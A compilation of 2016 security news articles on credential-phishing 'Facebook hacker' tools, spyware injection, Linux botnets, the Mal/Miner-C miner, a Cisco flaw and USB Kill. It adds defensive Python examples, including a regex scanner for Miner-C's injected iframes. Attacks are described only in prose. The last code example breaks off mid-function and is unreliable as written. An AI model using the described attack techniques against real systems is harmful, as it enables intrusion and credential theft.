Experts from the firm Blue Coat Elastica Cloud Threat Labs (BCECTL), now owned by Symantec, have discovered several versions of the Facebook Hacker Tools, including Faceoff Facebook Hacker, Skull Facebook Hacker and Scorpion Facebook Hacker.
“When they deploy this CaaS service, it becomes very easy for users to conduct cyberattacks,” said BCECTL director Aditya Sood.

The way the Facebook Hacker Tools work is very simple: typically they ask the wannabe hacker using the tool to provide the Facebook profile ID of the victim. The tool then displays some fake error messages and asks the user to provide an activation code to hack into the profile.

Experts at BCECTL discovered similar attacks by analyzing files hosted on Google Drive. Links to several Facebook Hacker tools were being actively distributed and shared on Google Drive.
“It’s hard to list the numbers, but we have discovered multiple instances [seven-plus] on Google Drive at the moment,” Sood said. “We haven’t checked on other cloud services or standard domains.” added Sood.

Hackers abuse the web publishing functionality included in cloud services like Google Drive. One of the tools used by the crooks lets an attacker send the wannabe hacker a Google Drive link that takes them to a “Facebook Friend’s Account Hacker” document. Of course, the wannabe hacker who intends to hack a friend’s account first has to provide his own Facebook login credentials.

Facebook Hacker Tools

Once the wannabe hacker has provided his credentials, they are sent back to the operator behind the scam.

Stolen credentials could be offered for sale in the underground market or used for a wide range of illegal activities.

This kind of attack is particularly insidious for enterprises: their employees’ credentials could be exposed, allowing attackers to access company resources. Attackers can target business users, steal their credentials and launch more sophisticated attacks later.

Think, for example, of the possibility of stealing the login credentials of an employee who works as a system administrator or who manages sensitive financial data of the company.

A growing number of companies are moving to cloud services; for this reason, it is essential to carefully evaluate the risks of exposure to this kind of attack linked to the use of social media.

“We are living in a world where these social networks have become part and parcel of our lives,” Sood explained. “Cybercriminals can abuse this information and other tools, and sell that access to users.”

In order to prevent this kind of attack, it is essential to adopt a proper security posture and promote awareness inside companies.

It is important to educate employees in the correct and safe use of social media, even in the workplace.

Another important aspect to consider is incident response, once such an attack against an employee is discovered.

The adoption of cloud security solutions could also help to mitigate the risk of these attacks.

PCI PIN Transaction Security requests upgradeable credit card readers

13.9.2016 securityaffairs Security

The Payment Card Industry Security Standards Council (PCI Council) has updated its standard to reduce fraudulent activity against PoS systems.
The number of credit card frauds involving Point-of-Sale (PoS) systems continues to increase; in recent months, numerous attacks have targeted retailers and hotels worldwide.

The PCI Council has responded by defining a new standard to reduce fraud: the organization plans to improve the security of PoS systems by making them easy to upgrade.

Last week, the PCI Council issued version 5.0 of the PCI PIN Transaction Security (PTS) Point-of-Interaction (POI) Modular Security Requirements.

A close look at the standard reveals the new requirements for the payment industry, in particular:

The adoption of a new control that requires PoS readers to support authenticated firmware updates: “The device must support firmware updates. The device must cryptographically authenticate the firmware and if the authenticity is not confirmed, the firmware update is rejected and deleted”
Core Physical Security Requirements also include tamper detection and response, so that the device becomes inoperable in response to an attack: “The device uses tamper-detection and response mechanisms that cause it to become immediately inoperable and result in the automatic and immediate erasure of any sensitive data that may be stored in the device, such that it becomes infeasible to recover the sensitive data. These mechanisms protect against physical penetration of the device by means of (but not limited to) drills, lasers, chemical solvents, opening covers, splitting the casing (seams), and using ventilation openings.”;
The devices have to resist side-channel attacks (e.g. monitoring of electromagnetic emanations) that could leak keys;
The device must execute a self-test at start-up to detect anomalies that could indicate a compromised state: “The device performs a self-test, which includes integrity and authenticity tests upon start-up and at least once per day to check whether the device is in a compromised state. In the event of a failure, the device and its functionality fail in a secure manner. The device must reinitialize memory at least every 24 hours.”
The new standard aims to counter the intensification of card-skimming attacks and to improve the security of the payment industry.
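To make the update and self-test requirements above concrete, here is an added Python model of the decision logic a reader would implement (example code, not PCI Council or vendor code): a staged update is installed only if it authenticates, is otherwise rejected and deleted, and the same check is re-run as the start-up and daily self-test, failing closed. The standard calls for cryptographic authentication of the firmware, which on a real device means verifying a vendor signature against a public key anchored in the device; as a standard-library stand-in, this example uses an HMAC-SHA256 tag under a hypothetical device-provisioned key, which shows the same accept/reject/delete flow but not the public-key trust model. The update images it writes are constructed for the demo.

```python
"""Model of the PCI PTS POI v5.0 firmware-update and self-test requirements.
Added example, not PCI Council or vendor code. HMAC-SHA256 under a
device-provisioned key stands in for the vendor signature check a real
reader would perform with an embedded public key."""
import hashlib
import hmac
import os
import tempfile

DEVICE_KEY = b"constructed-device-key-not-a-real-secret"  # hypothetical
TAG_LEN = 32  # bytes of HMAC-SHA256 appended to the image


def sign_image(payload: bytes, key: bytes = DEVICE_KEY) -> bytes:
    """Build an update image as payload || tag (what vendor tooling would emit)."""
    return payload + hmac.new(key, payload, hashlib.sha256).digest()


def authenticate_image(image: bytes, key: bytes = DEVICE_KEY):
    """Return the payload if the tag verifies, else None (constant-time compare)."""
    if len(image) <= TAG_LEN:
        return None
    payload, tag = image[:-TAG_LEN], image[-TAG_LEN:]
    expected = hmac.new(key, payload, hashlib.sha256).digest()
    return payload if hmac.compare_digest(tag, expected) else None


def apply_update(update_path: str, firmware_path: str, key: bytes = DEVICE_KEY) -> bool:
    """Install the staged update only if it authenticates; otherwise reject and delete it."""
    with open(update_path, "rb") as fh:
        image = fh.read()
    if authenticate_image(image, key) is None:
        os.remove(update_path)  # requirement: the update is rejected *and* deleted
        return False
    # Keep the tag with the installed image so the self-test can re-verify it later.
    tmp = firmware_path + ".tmp"
    with open(tmp, "wb") as fh:
        fh.write(image)
    os.replace(tmp, firmware_path)  # atomic on POSIX: a power cut leaves the old image intact
    os.remove(update_path)
    return True


def self_test(firmware_path: str, key: bytes = DEVICE_KEY) -> bool:
    """Start-up / daily integrity and authenticity test; False means fail secure."""
    try:
        with open(firmware_path, "rb") as fh:
            return authenticate_image(fh.read(), key) is not None
    except OSError:
        return False


def demo() -> dict:
    """Run a good update, then a tampered one, against a constructed device state."""
    d = tempfile.mkdtemp(prefix="pts_demo_")
    fw = os.path.join(d, "firmware.bin")
    good = os.path.join(d, "good.upd")
    bad = os.path.join(d, "bad.upd")
    with open(good, "wb") as fh:
        fh.write(sign_image(b"FW v5.0 constructed payload"))
    tampered = bytearray(sign_image(b"FW v5.0 constructed payload"))
    tampered[3] ^= 0x01  # flip one payload bit; the tag no longer matches
    with open(bad, "wb") as fh:
        fh.write(bytes(tampered))
    return {
        "good_applied": apply_update(good, fw),
        "self_test_ok": self_test(fw),
        "bad_applied": apply_update(bad, fw),
        "bad_deleted": not os.path.exists(bad),
        "still_ok": self_test(fw),
    }


if __name__ == "__main__":
    print(demo())
```

The tampered image is deleted rather than left on disk, and the previously installed firmware keeps passing the self-test, which is the fail-secure behaviour the requirement describes.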

Banks are observing a similar trend: the well-known investigative journalist Brian Krebs recently published a post warning about an alarming increase in skimming attacks against both American and European banks.

“Skimming attacks on ATMs increased at an alarming rate last year for both American and European banks and their customers, according to recent stats collected by fraud trackers.” wrote Krebs. “The trend appears to be continuing into 2016, with outbreaks of skimming activity visiting a much broader swath of the United States than in years past.”

The FICO Card Alert Service issued several warnings about a spike in ATM skimming attacks.

On April 8, FICO noted that its fraud-tracking service recorded a 546 percent increase in ATM skimming attacks from 2014 to 2015.

PoS devices that are hard to upgrade are a serious problem for the payment industry. Upgradeable card-reading kit is expensive, and the lack of a proper security posture delays the adoption of necessary countermeasures. Making card readers upgradeable should bring a significant improvement in point-of-sale security.

The banking industry continues to be under attack; chip-and-PIN technology has recently started to be adopted in the US because it improves security for customers, merchants and financial institutions.

The new standard will be effective from September 2017 and will replace the current version 4.1.

Motherboard shows us how surveillance software works
13.9.2016 securityaffairs BigBrothers

Surveillance is a profitable business. Motherboard has published a never-before-seen 10-minute video showing a live demo of a surveillance software product.
Recently, the iPhone hack carried out with NSO Group‘s Pegasus reignited the debate about the use of surveillance software. Who uses it? How? Are we able to defend our machines from such invasive surveillance?

NSO Group is just one company in a profitable market; to get an idea of its size, take a look at the Transparency Toolkit, a project that gathers open data on surveillance and human rights abuses and builds free software to examine it. The project’s official page includes tools and case studies.

Hacking Team, Gamma International, NSO Group, Blue Coat, and Verint are only the first names of surveillance firms that come to mind while writing this post, but the list is very long.

These firms design solutions used by law enforcement and intelligence agencies during their investigations. The expensive products sold by surveillance firms make it possible to spy on computers and smartphones; unfortunately, their abuse in the wild is very common. Many governments have used them to track dissidents and opposition figures, and in many cases the use of surveillance solutions represented a severe violation of human rights.

Although we can read thousands of good posts on the topic, it isn’t easy to see a live demo of a surveillance system, but the well-known journalist Lorenzo Bicchierai has published an interesting post on Motherboard intended to show us how government spyware infects a computer.

“Motherboard has obtained a never-before-seen 10-minute video showing a live demo for a spyware solution made by a little known Italian surveillance contractor called RCS Lab. Unlike Hacking Team, RCS Lab has been able to fly under the radar for years, and very little is known about its products, or its customers.” wrote Bicchierai.

The video published by Motherboard is a live demo presented by an employee of the Italian surveillance firm RCS Lab. It shows how the company’s spyware, Mito3, can be used to spy on an unaware suspect.

“Mito3 allows customers to listen in on the target, intercept voice calls, text messages, video calls, social media activities, and chats, apparently both on computer and mobile platforms. It also allows police to track the target and geo-locate it thanks to the GPS. It even offers automatic transcription of the recordings” reads a confidential brochure obtained by Motherboard.

RCS Lab’s Mito3 allows operators to launch man-in-the-middle (MiTM) attacks against a target, injecting malicious content into the connection to any website the target visits. The software is very easy to use, as explained in the post.

“An agent can choose whatever site he or she wants to use as a vector, click on a dropdown menu and select “inject HTML” to force the malicious popup to appear, according to the video,” reported Motherboard.

surveillance software live-demo

In the video the RCS employee chooses the mirc.com website (the site of the mIRC chat client) as the attack vector and injects the malware into it in order to compromise the target machine. When the victim visits mirc.com, a fake Adobe Flash update installer pops up, created by the surveillance software through the injected code. The user is urged to click “install” in order to keep browsing the website, allowing the spyware to infect the machine. Injection of this kind works against pages served over plain HTTP; on a properly validated HTTPS connection the injected content would fail the TLS integrity check unless the attacker also controls a certificate the browser trusts.

I wish to thank Motherboard and Lorenzo Bicchierai for their post that gives us more information on surveillance practices.

Mal/Miner-C mining malware leverages NAS devices to spread itself
12.9.2016 securityaffairs Virus

Experts from Sophos discovered Mal/Miner-C, a malware designed to abuse resources of the infected machine to mine Monero (XMR) cryptocurrency.
Malware researchers from security firm Sophos have analyzed a new strain of malware detected as Mal/Miner-C that was designed to abuse resources of the infected machine to mine Monero (XMR) cryptocurrency.

The experts discovered that the new malware leverages network-attached storage (NAS) devices as an attack vector.

The authors of Mal/Miner-C used the NSIS (Nullsoft Scriptable Install System) scripting language to develop it.

One of the most interesting features of the Mal/Miner-C malware is its ability to abuse FTP servers in an effort to spread itself.

Some samples analyzed by the researchers included a module, called tftp.exe, that generates random IP addresses and attempts to connect to them over FTP using a predefined list of login credentials.

If the threat manages to connect to an FTP service, it copies itself to that server and modifies the .htm and .php files stored on it, injecting code that generates an iframe referencing the malicious file uploaded to the server.

“If the embedded credentials are able to successfully connect to an FTP service, it tries to copy itself to the server and modify an existing web-related file with the extension .htm or .php in an attempt to further infect visitors to the host system.” reads the analysis from Sophos.

“If a file with this extension is found, the threat injects source code that creates an iFrame referencing the files info.zip or Photo.scr. “

When an unaware user visits a website compromised by the malware, he is presented with a “save file” dialog serving the malicious files; if the victim downloads and opens them, his PC is infected with Mal/Miner-C.
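The infection pattern described above is easy to check for on a share you administer. As an added example (not Sophos’ code and not from the page), the following Python script walks a directory tree, such as a mounted NAS public folder or a mirror of an FTP share, and reports dropped info.zip / Photo.scr files together with any .htm/.html/.php pages that carry an injected iframe pointing at them. The sample share it builds is constructed for the demo and contains a placeholder file, not the real payload.

```python
"""Scan a directory tree for the Mal/Miner-C infection pattern Sophos describes:
a dropped info.zip / Photo.scr next to web pages carrying an injected <iframe>
that points at them. Added example, not Sophos' code; sample content is constructed."""
import os
import re
import tempfile
from typing import Dict, List

# Filenames the malware drops into every folder it can write to.
DROPPED_NAMES = {"info.zip", "photo.scr"}

# Web files the malware rewrites (the Sophos quote names .htm and .php; .html is
# included as well because servers commonly use it and the check is cheap).
WEB_EXTS = (".htm", ".html", ".php")

# An iframe whose src ends in one of the payload names; case-insensitive,
# tolerant of optional quotes, whitespace around '=', and a trailing query string.
IFRAME_RE = re.compile(
    r"<iframe\b[^>]*\bsrc\s*=\s*['\"]?([^'\"\s>]*?(?:info\.zip|photo\.scr))",
    re.IGNORECASE,
)


def find_injected_iframes(content: str) -> List[str]:
    """Return the src values of iframes that reference the Miner-C payload names."""
    return [m.group(1) for m in IFRAME_RE.finditer(content)]


def scan_tree(root: str) -> Dict[str, List[str]]:
    """Walk root and return {"dropped": [paths], "injected": [paths]}."""
    report: Dict[str, List[str]] = {"dropped": [], "injected": []}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            if name.lower() in DROPPED_NAMES:
                report["dropped"].append(path)
                continue
            if name.lower().endswith(WEB_EXTS):
                try:
                    with open(path, "r", encoding="utf-8", errors="replace") as fh:
                        data = fh.read()
                except OSError:
                    continue  # unreadable file: skip rather than abort the scan
                if find_injected_iframes(data):
                    report["injected"].append(path)
    return report


def build_demo_share() -> str:
    """Constructed sample share: one clean page, one injected page, one dropped placeholder."""
    root = tempfile.mkdtemp(prefix="minerc_demo_")
    os.makedirs(os.path.join(root, "Public"))
    with open(os.path.join(root, "index.html"), "w") as fh:
        fh.write("<html><body><h1>Welcome</h1></body></html>")
    with open(os.path.join(root, "Public", "about.php"), "w") as fh:
        fh.write("<?php echo 'hi'; ?>\n"
                 '<iframe src="Photo.scr" width="1" height="1"></iframe>')
    with open(os.path.join(root, "Public", "Photo.scr"), "wb") as fh:
        fh.write(b"MZ\x90\x00")  # placeholder bytes, not the real malware
    return root


if __name__ == "__main__":
    print(scan_tree(build_demo_share()))
```

Run it against the mount point of the NAS public folder; any hit in "injected" means the web files have already been rewritten and visitors are being served the payload, so the pages need to be restored from a clean copy, not just the dropped files removed.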

According to Sophos, more than 1.7 million infections were observed in the first half of 2016, but they were associated with only 3,150 unique IP addresses, because the malware copies itself to every folder on a compromised FTP server.

The experts then searched the Internet for vulnerable devices. A first scan with the Censys search engine identified just under 3 million FTP servers worldwide.

Then the researchers tried to connect anonymously to the FTP services with a scanning script in order to find anonymous FTP servers with write access.

The results were as follows:

IP numbers of FTP servers on the original list: 2,932,833.
FTP servers active during the test: 2,137,571.
Active servers allowing anonymous remote access: 207,110.
Active servers where write access was enabled: 7,263.
Servers contaminated with Mal/Miner-C: 5,137.
Mal/Miner-C infections

The malware targeted various types of FTP servers, but Sophos noticed it mostly hit Seagate’s Central NAS product. This NAS exposes a public folder that cannot be deleted or deactivated; the attackers upload the malware into that folder in the hope that users will execute the files when they find them.

Note that the malware does not infect the NAS device itself; it abuses the device as a distribution point to infect other machines and spread in the wild.

The experts also analyzed the wallets used by the cybercriminals behind the campaign and determined that infected machines mined roughly $86,000 in Monero.

LuaBot is the first Linux DDoS botnet written in Lua Language

11.9.2016 securityaffairs Virus

The researcher MalwareMustDie discovered LuaBot, a trojan completely coded in the Lua language that targets Linux platforms to recruit them into a DDoS botnet.
Let’s continue our tour of Linux security, focusing on malicious code specifically designed to target such systems.

The popular security researcher MalwareMustDie, who recently reported the new ELF trojan backdoor Linux/Mirai, also discovered a Trojan that infects Linux systems and enlists them in distributed denial of service (DDoS) attacks.

The malware was dubbed Linux/LuaBot because it is written in the Lua programming language (version 5.3.0) and targets Linux-based systems.

Lua is a lightweight multi-paradigm programming language; it is cross-platform since its interpreter is written in ANSI C. It was designed primarily for embedded systems and client applications.

Web servers and Internet of Things (IoT) devices are the privileged targets of the Linux/LuaBot botnet.

“On Mon, Aug 29, 2016 at 5:07 PM I received this ELF malware sample from a person (thank you!). There wasn’t any detail or comment whatsoever, just one cute little ARM ELF stripped binary file with following data:” wrote the researcher in a blog post.

“This is a new ELF botnet malware, coded in Lua [link] language ( @$LuaVersion: Lua 5.3.0). It is the first time to find an lua language ELF compiled malware, specifically in ARM cpu architecture, so let’s call it as “Linux/LuaBot”.”

The analysis of the binary revealed the signature of a Sample Matrix RSA-4096 Certificate, a trace of the MatrixSSL library used by the bot clients to establish HTTPS connections.

The binary also included MatrixSSL’s code libraries for encryption operations, and MalwareMustDie also noticed a hardcoded message from the coder (“Hi. Happy reversing, you can mail me: [REDACTED .ru email address].”), shown in the following image.

LuaBot linux/lua botnet binary

The bot was controlled by a C&C server hosted in the Netherlands on the infrastructure of dedicated server hosting service WorldStream.NL.

MalwareMustDie also discovered a portion of code labeled “penetrate_sucuri,” likely referring to evasion mechanisms meant to elude the popular Sucuri Web Application Firewall.

The researcher has no doubt this is a complex and effective botnet; the author of Linux/LuaBot implemented a command interface that can be used to run encrypted remote commands.

“If you see carefully in the above description, there are the “cmdline”, and “cmdline args” spotted in several parts in ELF reversed code, forensics results and also source code trace too.” explained MalwareMustDie.

“The hacker can do a lot of things with it via a crypted remote commands pushed to his bots through this command interface, so this bot can be used to execution for the Lua script. So one of the botnet functionality is the remote execution via this interface.” states the analysis.

A quick test on the online scanning service VirusTotal showed that the binary was still fully undetected (FUD) at the time of the analysis.

After his first analysis, MalwareMustDie received the DDoS component used by the Linux/LuaBot botnet, the missing piece he had been searching for. This module too was written in Lua and had a zero detection rate.

“This sample [link] is explaining the “missing link” of the DDoS function expected from this botnet. This module was coded in Lua and using the same static compilation environment, with zero detection ratio too. This additional ELF could be “the payload” that we are waiting for. This module is explaining a lot of detail on how the attack is performed, a simple download and execution command executed by the infected nodes from remote access via shell or internal command line interface is enough to trigger this attack.” explained the researchers.

According to MalwareMustDie, the number of ELF malware samples surfacing on the Internet is growing rapidly.

“There are plenty new ELF malware coming & lurking our network recently & hitting out Linux layer IoT and services badly.” explained the researcher.

The data is confirmed by investigations by other research teams: a joint research effort by Level 3 Communications and Flashpoint identified a million devices infected by the BASHLITE malware.

The BASHLITE malware includes code from the ShellShock exploit and has been used by threat actors in the wild to run distributed denial-of-service (DDoS) attacks.

It can infect multiple Linux architectures, which is why crooks use it to target Internet of Things devices.

In June, experts from the security firm Sucuri spotted a botnet composed of tens of thousands of CCTV devices that had been used by crooks to launch DDoS attacks against websites.

I suggest reading the MalwareMustDie analysis of LuaBot; it is full of interesting data.

CVE-2016-6399 – CISCO disclosed unpatched flaw in ACE products
11.9.2016 securityaffairs Vulnerebility

Cisco disclosed the existence of the CVE-2016-6399 flaw, which can be exploited by remote unauthenticated attackers to trigger DoS conditions in ACE products.
Experts at Cisco have disclosed a high-severity vulnerability, tracked as CVE-2016-6399, that can be exploited by remote unauthenticated attackers to trigger DoS conditions in some Application Control Engine (ACE) products.

The good news is that there is no evidence that CVE-2016-6399 has been exploited in the wild; the bad news is that some Cisco customers experienced problems after an Internet research project triggered the vulnerability.

The researchers behind the project had been scanning SSL/TLS servers on the Internet, including those of Cisco customers.

“A vulnerability in the SSL/TLS functions of the Cisco ACE30 Application Control Engine Module and the Cisco ACE 4700 Series Application Control Engine Appliances could allow an unauthenticated, remote attacker to cause a denial of service (DoS) condition on the affected device.” reads the Cisco Security Advisory.

The problem affects Cisco ACE 4710 Application Control Engine appliances and Cisco ACE30 Application Control Engine modules.

The Cisco ACE 4710 Application Control Engine is a solution designed to enhance application availability and performance and to improve resilience to cyber attacks.

CVE-2016-6399 CISCO ACE 4710 products

The appliances implement load-balancing and application delivery features. The root cause of the issue is incomplete input validation in the SSL/TLS code, which a remote unauthenticated attacker can exploit to make the device reload by sending specially crafted SSL/TLS packets.

“The vulnerability is due to incomplete input validation checks in the SSL/TLS code. An attacker could exploit this vulnerability by sending specific SSL/TLS packets to the affected device. An exploit could allow the attacker to trigger a reload of the affected device.” continues the advisory.

The flaw was discovered while the Cisco experts were handling customer support requests.

The products affected by CVE-2016-6399 reached end of life in July 2013, but Cisco still offers support for them and plans to do so until January 2019. Cisco has promised to release software updates that address the issue.

At the time of writing there is no workaround; Cisco plans to release software updates as soon as possible.

I suggest taking a look at the Cisco security advisory, which includes useful information on the flaw, including indicators of compromise (IoC) that can help customers detect attempts to exploit it.

PIL filed in Court to Ban ‘Pokémon Go’ in India for Hurting Religious Sentiments
10.9.2016 thehackernews IT
Pokémon GO has not yet been officially launched in India, but the location-based augmented reality game has already fueled a privacy debate and a request for a ban.
Isn't that weird?
A Gujarat resident, Alay Anil Dave has recently filed a Public Interest Litigation (PIL) in the Gujarat High Court against Niantic, developers of Pokémon Go, over allegations that the game is hurting religious sentiments of Hindus and Jains by showing virtual eggs in places of worship of different religious groups.
The launch date of Pokémon GO for India has not been announced so far, but millions of Indians have already downloaded the game from third-party app markets and are playing it in the streets.
However, many are still waiting for an official release of the game in India, as they don’t want to end up installing malicious versions of Pokémon GO that could install malware on their phones, allowing hackers to compromise their devices.
Pokémon GO has become the most successful game launch of all time, with more than 500 million downloads in the just over two months since its release.
The game is reported to have almost as many daily active users as Twitter.
In fact, Niantic Labs CEO John Hanke announced on stage at Apple's iPhone 7 event on Wednesday that Pokémon GO is coming to the Apple Watch.
How Does Pokémon GO Hurt Religious Sentiments?
But why does the petitioner want India to ban Pokémon GO?
Actually, this augmented reality game requires gamers to walk around homes, parks and local surroundings to find new Pokémon characters, as well as achieve goals like hatching incubating eggs.
The most common Pokémon hatch from 2 km eggs, while the rarest ones come from 10 km eggs. But Niantic did not anticipate that some Indians would have a problem with these eggs.
"People playing the game get their points in the form of eggs which generally appear in the places of worship of different religious groups. To find eggs in temples of Hindus and Jains is blasphemous, and therefore my client has sought ban on the game from the country," Dave's lawyer said.
However, we talked to some security experts and privacy advocates in India, who shared their opinions on the case.
Dinesh Bareja, an information security professional and researcher at IndiaWatch, provided a statement to The Hacker News, saying:
"Such PILs are frivolous and just designed to get the person his few moments of fame. Chasing a virtual image into a temple or any other place cannot be termed desecration of the place of worship and, like many other PILs, this is also going to be a waste of the valuable time of the Hon'ble Court."
Another Information security professional, who wants to remain anonymous, told us:
"Some Hindu temples still have a tradition of Bali of Animals [Animal sacrifice]. So painting all Hindu temples as a symbol of non-violence and hurting religious sentiments isn't true."
The Editor of the Cyber Secure India portal said, "There seems no strength in the PIL, frankly speaking. However, the PIL may only be appropriate if the person who filed it obtained a legitimate licensed copy of the game; otherwise, the charge may be dropped. Further, the fact that an egg was found is a question of perception, it being an animated pictorial representation."
Pokémon Go, Privacy and National Security
Along with hurting religious sentiments by displaying eggs in houses of worship, the PIL also cites that Pokémon Go could be used by the CIA to create maps of sensitive "areas currently unavailable in Google Maps."
Adv. Prashant Mali, a cyber security law specialist lawyer, told The Hacker News that he is primarily concerned about privacy and about accidents caused by this game.
"It has become a fashion to file a PIL and get cheap and fast publicity. There are other games which children play which have a lot more violence, and some games do promote sexual violence," Mali said.
"I feel the Government, at this rate of censorship, may appoint a Censor Board like for films to moderate even video games. When the game gets launched in India, they may take care of religious feelings by default. Now it is an illegal game, so the PIL may even get dismissed."
The PIL also raises other concerns about the game, such as infringement of the right to privacy, the threat to the lives of players who walk around the streets to catch Pokémon, the game's influence on the minds of children and on "behavior as an Indian," among others.
"All the maps are via open maps, already in the public domain, so that issue is sorted. Use of AR in sensitive areas from the government's viewpoint can be a problem. To avoid this, use of camera phones and recorders should be banned in such declared sensitive areas, as it is not just one game that can cause issues," an anonymous follower comments.
The PIL was heard on Wednesday by a division bench of Chief Justice R. Subhash Reddy and Justice Vipul Pancholi, and the Gujarat High Court has issued a notice to Niantic Inc. of the US, which has yet to respond.
If Pokémon GO gets banned in India, it will not be the first country to do so. Last month, Iran officially banned Pokémon GO within the country due to certain "security concerns."

Doctor Web discovers the first Linux Trojan that is written in Rust language
10.9.2016 securityaffairs Virus

Experts from Dr Web discovered a new Linux Trojan called Linux.BackDoor.Irc.16 that is written in the Rust programming language.
It is a prolific period for VXers working on Linux Trojans; a new strain was recently spotted by experts from Doctor Web. The new Linux Trojan has been named Linux.BackDoor.Irc.16 and is written in the Rust programming language. Rust is a general-purpose, multi-paradigm, compiled programming language promoted by Mozilla Research. It is designed to be a "safe, concurrent, practical language."
“Rust is a systems programming language that runs blazingly fast, prevents segfaults, and guarantees thread safety. “

“Unlike the majority of its counterparts, Linux.BackDoor.Irc.16 is written in Rust, a programming language whose creation was sponsored by Mozilla Research. ” reported Dr. Web in a blog post.

The Linux.BackDoor.Irc.16 Linux Trojan implements the features of a classic backdoor: attackers remotely control the infected system by sending it commands over the IRC (Internet Relay Chat) protocol.

Once the Linux Trojan is executed it connects to a specific public chat channel that is indicated in its configuration, then it waits for commands.


According to malware researchers from Dr.Web, the Linux Trojan is able to execute just four commands:

Connect to a specified chat channel;
Gather information on the infected host and send it back to the crooks;
Send the crooks data about the applications running on the system;
Delete itself from the infected machine.
Rust's first stable version was released in 2015. According to Dr Web, the Linux.BackDoor.Irc.16 backdoor was designed to be cross-platform malware. The experts who analyzed the threat speculate that it is a prototype for an ongoing project: they noticed that the Trojan is not able to replicate itself and that the IRC channel used as C&C infrastructure is no longer active.

“Doctor Web’s analysts believe that Linux.BackDoor.Irc.16 is, in fact, a prototype (Proof of Concept), because it cannot replicate itself, and the IRC channel used by the Trojan to receive commands from cybercriminals is not currently active.” reported Dr Web.

Other Linux malware has recently been spotted in the wild by security experts, such as Linux.Rex.1, which is capable of self-spreading and of creating a peer-to-peer botnet, and Linux.Lady, which crooks use to mine cryptocurrency.

Oh, It's On Sale! USB Kill to Destroy any Computer within Seconds
9.9.2016 thehackernews Hacking

Remember Killer USB stick?
It was a proof-of-concept USB device, designed last year by a Russian researcher known as Dark Purple, that destroys sensitive components of a computer when plugged in.
Now, someone has actually created the Killer USB stick that destroys almost anything – such as Laptops, PCs, or televisions – it is plugged into.
A Hong Kong-based technology manufacturer is selling a USB thumb drive called USB Kill 2.0 that can fry almost any computer it's plugged into by introducing a power surge via the USB port. It costs $49.95.
How does USB Kill 2.0 work?
As the company explains, when plugged in, the USB Kill 2.0 stick rapidly charges its capacitors via the USB power supply, and then discharges – all in a matter of seconds.
The USB stick discharges 200 volts DC over the data lines of the host machine, and this charge-and-discharge cycle repeats several times per second until the USB Kill stick is removed.
"When tested on computers, the device isn't designed or intended to erase data," the company says. "However, depending on the hardware configuration (SSD [solid-state drive] vs. platter HDD [hard disk drive]), the drive controllers may be damaged to the point that data retrieval is impractical."
"Any public facing USB port should be considered an attack vector," the company says in a news release. "In data security, these ports are often locked down to prevent exfiltration of data or infiltration of malware, but are very often unprotected against electrical attack."
When And For Whom USB KILL Would Be Useful?
USB Kill stick could be a boon for whistleblowers, journalists, activists, and, not to forget, cyber criminals, who want to keep their sensitive data away from law enforcement as well as cyber thieves.
It is like "if you're caught, kill yourself," in the same fashion as terrorists do. Here I mean killing the data on your laptop if law enforcement has seized it. And the USB Kill stick does that for you.
However, the company claims to have developed USB Kill 2.0 stick for the sole purpose of allowing companies to test their devices against USB Power Surge attacks and to prevent data theft via "Juice Jacking" attacks.
Video Demonstration
You can watch the video demonstration below by the company that shows USB Kill 2.0 stick in action.

The company claims that about 95% of all devices available on the market today are vulnerable to power surge attacks introduced via the USB port.
According to the company, the only devices not vulnerable to USB Kill attacks are recent models of Apple's MacBook, which optically isolate the data lines on their USB ports.
Juice jacking is a type of attack in which a malicious charging station or malware on a computer surreptitiously copies data from a smartphone, tablet or other device (or installs malware on it) through a USB charging port that doubles as a data connection.
While USB Kill 2.0 has been "designed and tested to be safe," the company warns that the USB stick "is a high-voltage device" and is only meant for "responsible adults." Also, the company's website "strongly condemns the malicious use of its products."
USB Kill 2.0 also comes with a USB protection shield, called the Test Shield and sold separately for $15.70, which is designed to allow testing of the USB Killer stick without destroying the host machine.

Google Chrome to Label Sensitive HTTP Pages as "Not Secure"
9.9.2016 thehackernews Safety
Although more than three months remain, Google has planned a New Year gift for Internet users who are concerned about their privacy and security.
Starting in January of 2017, the world's most popular web browser Chrome will begin labeling HTTP sites that transmit passwords or ask for credit card details as "Not Secure" — the first step in Google's plan to discourage the use of sites that don't use encryption.
The change will take effect with the release of Chrome 56 in January 2017 and affect unencrypted web pages that contain entry fields for sensitive data, such as passwords and payment card numbers, according to a post on the Google Security Blog.
Unencrypted HTTP is considered particularly dangerous for login pages and payment forms, because it allows a man-in-the-middle attacker to intercept passwords, session cookies and credit card data as they travel across the network.
In subsequent releases, Chrome will extend the warning, for example by labeling all HTTP pages "Not secure" in Incognito mode, where users may have higher expectations of privacy.
Then, in the future, Chrome will flag all HTTP sites as "Not secure" with the same red triangle indicator the browser currently uses to indicate a broken HTTPS website.
"Chrome currently indicates HTTP connections with a neutral indicator," Emily Schechter wrote in a blog post. "This doesn't reflect the true lack of security for HTTP connections. When you load a website over HTTP, someone else on the network can look at or modify the site before it gets to you."
This isn't the first time Google has taken steps to encourage site owners to switch to HTTPS. Two years ago, Google changed its search ranking algorithm to give a boost to websites served over encrypted HTTPS connections.
Last month, Google also enabled HTTP Strict Transport Security (HSTS) on its main domain (google.com), so that browsers which have seen the policy refuse to connect to it over insecure HTTP.
Google reported that today, more than half of the websites visited by Chrome users are already encrypted.
Not only Google, but Mozilla has also been encouraging HTTPS adoption through the Let's Encrypt project it sponsors, which provides free SSL/TLS certificates to website owners to help them deploy HTTPS for their services.
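To make the new rule concrete, here is an added example (not Google's or Chrome's code) that applies a simplified reading of the Chrome 56 heuristic to a few constructed pages: an http:// page containing a password field or a payment-card field gets the "Not secure" verdict, and the HSTS header mentioned above is only counted when the page is actually served over HTTPS, since browsers ignore that header on plain-HTTP responses. The sample URLs, HTML and headers are invented for the example.

```python
"""Flag pages that Chrome 56's "Not Secure" rule would label, plus a basic
HSTS check. Added illustration, not Google's or Chrome's own code; the
heuristic is a simplified reading of the announcement: an http:// page that
contains a password field or a payment-card field. The sample pages below are
constructed for the example, not real sites."""
from html.parser import HTMLParser
from urllib.parse import urlsplit

# autocomplete tokens that identify payment-card fields (WHATWG autofill names)
CARD_AUTOCOMPLETE = {"cc-number", "cc-csc", "cc-exp", "cc-exp-month",
                     "cc-exp-year", "cc-name"}


class SensitiveFieldFinder(HTMLParser):
    """Count <input> elements that collect passwords or card data."""

    def __init__(self):
        super().__init__()
        self.password_fields = 0
        self.card_fields = 0

    def handle_starttag(self, tag, attrs):
        if tag != "input":
            return
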